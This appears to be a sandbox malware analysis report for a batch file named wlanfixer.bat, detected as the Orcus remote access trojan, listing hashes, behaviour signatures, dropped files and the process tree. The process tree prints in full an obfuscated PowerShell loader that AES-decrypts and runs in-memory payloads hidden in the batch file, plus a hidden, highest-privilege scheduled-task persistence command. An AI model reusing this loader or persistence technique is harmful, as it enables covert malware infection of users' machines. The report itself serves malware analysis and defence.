Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    152s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240412-en
  • resource tags

    arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    23/04/2024, 13:04

General

  • Target

    wlanfixer.bat

  • Size

    3.5MB

  • MD5

    45730c9d81cdc2677ea2bd082eb79edb

  • SHA1

    7ece7b975ab6506d83dac94f685e2cedbe56dd6b

  • SHA256

    31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4

  • SHA512

    d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687

  • SSDEEP

    49152:mR8s3zr/pxAN80OHguszxrEC/agxlnUrLvlKNNwI:d

Malware Config

Signatures

  • Orcus

    Orcus is a Remote Access Trojan that is being sold on underground forums.

  • Orcurs Rat Executable 1 IoCs
  • Blocklisted process makes network request 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:564
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Local\Temp\wlanfixer.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4192
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_816_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_816.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3696
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_816.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2360
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_816.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1240
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RoF8A1JenCTYvN5F1s7vRkzErCsX+lTeTh7sYe5+YqQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('p+fhmC+G5ORMSHe10ZC4cg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $CViub=New-Object System.IO.MemoryStream(,$param_var); $bMvnM=New-Object System.IO.MemoryStream; $IwWYG=New-Object System.IO.Compression.GZipStream($CViub, [IO.Compression.CompressionMode]::Decompress); $IwWYG.CopyTo($bMvnM); $IwWYG.Dispose(); $CViub.Dispose(); $bMvnM.Dispose(); $bMvnM.ToArray();}function execute_function($param_var,$param2_var){ $vQMJY=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $GYRaA=$vQMJY.EntryPoint; $GYRaA.Invoke($null, $param2_var);}$uwemL = 'C:\Users\Admin\AppData\Roaming\startup_str_816.bat';$host.UI.RawUI.WindowTitle = $uwemL;$WQdbL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($uwemL).Split([Environment]::NewLine);foreach ($CKiFo in $WQdbL) { if ($CKiFo.StartsWith(':: ')) { $vOqbs=$CKiFo.Substring(3); break; }}$payloads_var=[string[]]$vOqbs.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:1596

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    df472dcddb36aa24247f8c8d8a517bd7

    SHA1

    6f54967355e507294cbc86662a6fbeedac9d7030

    SHA256

    e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

    SHA512

    06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    1KB

    MD5

    fc96ab0084537b88924da4116fa8943e

    SHA1

    836ebcefd0448d4a65aa28de527cbdf566176189

    SHA256

    648b2a209ff053ed8373fbeb61d16686daf21bd19b7f1bdf6324aa1b807a8ed0

    SHA512

    aec7cad1d3f12e915fbe6d78f8c1cea1ba79fc7c8e48584f166b911184c5dfd7c9432072093fb430907501934feaff6e4d07daeaf280bc9b3d603aac9459c05c

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xae43see.tqd.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\startup_str_816.bat

    Filesize

    3.5MB

    MD5

    45730c9d81cdc2677ea2bd082eb79edb

    SHA1

    7ece7b975ab6506d83dac94f685e2cedbe56dd6b

    SHA256

    31f17bf44fd2ce3fb0fde898d5bea0c35d18c82d3e2e9fcdae3cb8cd9f9fffb4

    SHA512

    d4504b96971c71e38207b56ada95f5e78f8536aaa88a3cbeebaa16627ff548f620672c0d4c61e74707fdc2662ec99584b5dc8d6e3fa1b7056f9595531422b687

  • C:\Users\Admin\AppData\Roaming\startup_str_816.vbs

    Filesize

    115B

    MD5

    c3f65a5cc97aab9f7782b85751635c80

    SHA1

    10baccdc10c4a1e0626f16792825695e3ee7cc72

    SHA256

    94c95a9f53a3f37f7c18ed6652d6d4e26daa77165172329cf6e8295bc9035a46

    SHA512

    f8baf91b5ae962c41a228009eb40e454876a71b9b65f37bc9a82cc76a6e29b16c7150008904f8369098d406f85cf3f587f610004ac58746e42ff6c1688d134ea

  • memory/1596-55-0x000001FCCE820000-0x000001FCCE82E000-memory.dmp

    Filesize

    56KB

  • memory/1596-58-0x000001FCCE840000-0x000001FCCE850000-memory.dmp

    Filesize

    64KB

  • memory/1596-64-0x000001FCCE4F0000-0x000001FCCE500000-memory.dmp

    Filesize

    64KB

  • memory/1596-63-0x000001FCCE4F0000-0x000001FCCE500000-memory.dmp

    Filesize

    64KB

  • memory/1596-62-0x000001FCCE4F0000-0x000001FCCE500000-memory.dmp

    Filesize

    64KB

  • memory/1596-61-0x00007FFE6E020000-0x00007FFE6EAE2000-memory.dmp

    Filesize

    10.8MB

  • memory/1596-57-0x000001FCCE860000-0x000001FCCE878000-memory.dmp

    Filesize

    96KB

  • memory/1596-56-0x000001FCCE850000-0x000001FCCE862000-memory.dmp

    Filesize

    72KB

  • memory/1596-54-0x000001FCB62D0000-0x000001FCB632C000-memory.dmp

    Filesize

    368KB

  • memory/1596-53-0x000001FCD6DE0000-0x000001FCD70DA000-memory.dmp

    Filesize

    3.0MB

  • memory/1596-42-0x000001FCCE4F0000-0x000001FCCE500000-memory.dmp

    Filesize

    64KB

  • memory/1596-41-0x000001FCCE4F0000-0x000001FCCE500000-memory.dmp

    Filesize

    64KB

  • memory/1596-40-0x00007FFE6E020000-0x00007FFE6EAE2000-memory.dmp

    Filesize

    10.8MB

  • memory/3696-26-0x00000260E4890000-0x00000260E48A0000-memory.dmp

    Filesize

    64KB

  • memory/3696-27-0x00000260E4890000-0x00000260E48A0000-memory.dmp

    Filesize

    64KB

  • memory/3696-16-0x00007FFE6E020000-0x00007FFE6EAE2000-memory.dmp

    Filesize

    10.8MB

  • memory/3696-25-0x00000260E4890000-0x00000260E48A0000-memory.dmp

    Filesize

    64KB

  • memory/3696-28-0x00000260E4890000-0x00000260E48A0000-memory.dmp

    Filesize

    64KB

  • memory/3696-31-0x00007FFE6E020000-0x00007FFE6EAE2000-memory.dmp

    Filesize

    10.8MB

  • memory/4192-13-0x00000222DA0B0000-0x00000222DA0B8000-memory.dmp

    Filesize

    32KB

  • memory/4192-8-0x00000222DA700000-0x00000222DA722000-memory.dmp

    Filesize

    136KB

  • memory/4192-9-0x00007FFE6E020000-0x00007FFE6EAE2000-memory.dmp

    Filesize

    10.8MB

  • memory/4192-12-0x00000222DA6C0000-0x00000222DA6D0000-memory.dmp

    Filesize

    64KB

  • memory/4192-59-0x00000222DA6C0000-0x00000222DA6D0000-memory.dmp

    Filesize

    64KB

  • memory/4192-60-0x00000222DA6C0000-0x00000222DA6D0000-memory.dmp

    Filesize

    64KB

  • memory/4192-10-0x00000222DA6C0000-0x00000222DA6D0000-memory.dmp

    Filesize

    64KB

  • memory/4192-52-0x00007FFE6E020000-0x00007FFE6EAE2000-memory.dmp

    Filesize

    10.8MB

  • memory/4192-11-0x00000222DA6C0000-0x00000222DA6D0000-memory.dmp

    Filesize

    64KB

  • memory/4192-14-0x00000222FABE0000-0x00000222FAE88000-memory.dmp

    Filesize

    2.7MB